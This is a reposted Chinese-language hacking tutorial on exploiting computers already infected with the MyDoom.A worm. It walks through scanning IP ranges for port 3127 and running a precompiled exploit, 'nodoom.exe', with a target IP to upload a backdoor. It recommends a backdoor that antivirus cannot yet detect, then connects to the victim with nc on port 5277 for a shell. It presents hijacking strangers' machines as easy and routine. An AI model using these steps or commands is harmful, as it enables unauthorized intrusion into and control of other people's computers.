网络通信 频道

利用MyDoom.A蠕虫获取系统权限

大名鼎鼎的MyDoom.A相信有留意病毒的朋友都有注意吧,短短几天,只是单纯地利用邮件传播,但是几天功夫竟然在全球迅速传播开了,更在几天之内,更产生了变种,实在是不得不说一声佩服啊。

   而且,过了几天我就在一个外国的网站找到了溢出MyDoomd.A的exploit和编译好的溢出程序的。感觉现在利用病毒或者蠕虫来找肉鸡十分流行。例如前一段时间的爱之门,只要扫描20168端口就可以拿到一个具有admin权限的shell。话说我拿到溢出程序后,又利用google找到了MyDoom的扫描器,在测试一下,发现这个蠕虫的泛滥情况的确十分严重,我随意地扫了一个ip段,就有N多地机器中了这个蠕虫,从win98到winxp,都有!根据我和QQ上的一位好友测试,据说他还找到了中了win2003的,实在是对我们国内的安全情况感到无语啊,
  

   好了,废话就不多说了,打开CMD,cd到存放溢出MyDoom.A的文件夹那里,运行溢出程序,界面如图1   

 


   看就明白怎么用了,呵呵,非常简单。不过在溢出之前,倒也要扫描器扫扫,其实我们只要用superscan扫3127端口也可以得到很多的扫描结果,只是我比较喜欢用专用的扫描器而已,打开扫描器,界面如图   
 

  
   大家所看到的是我已经扫描完毕的结果了,显示VULNERABLE的,就是可以溢出的。我们现在开始来试试。

   直接提交nodoom.exe XXX.159.95.112 3127 winshell.exe ,其中winshell就是我们要传输的后门,你也可以换成其他的,不过最好是换成杀毒软件暂时不可以查杀的后门,不然……   

   呵呵,后果可想而知。Ok,提示文件传输完成,而且并运行后,直接连接后门了,我的是默认端口,所以直接用nc连接5277端口。呵呵,看来是一台xp啊,图
 


   得到shell后,我们可以执行任何的命令了,不过这个就不在本文的讨论范围了。

文章转载地址:http://www.cnpaf.net/Class/hack/05121820345253537486.htm

0
相关文章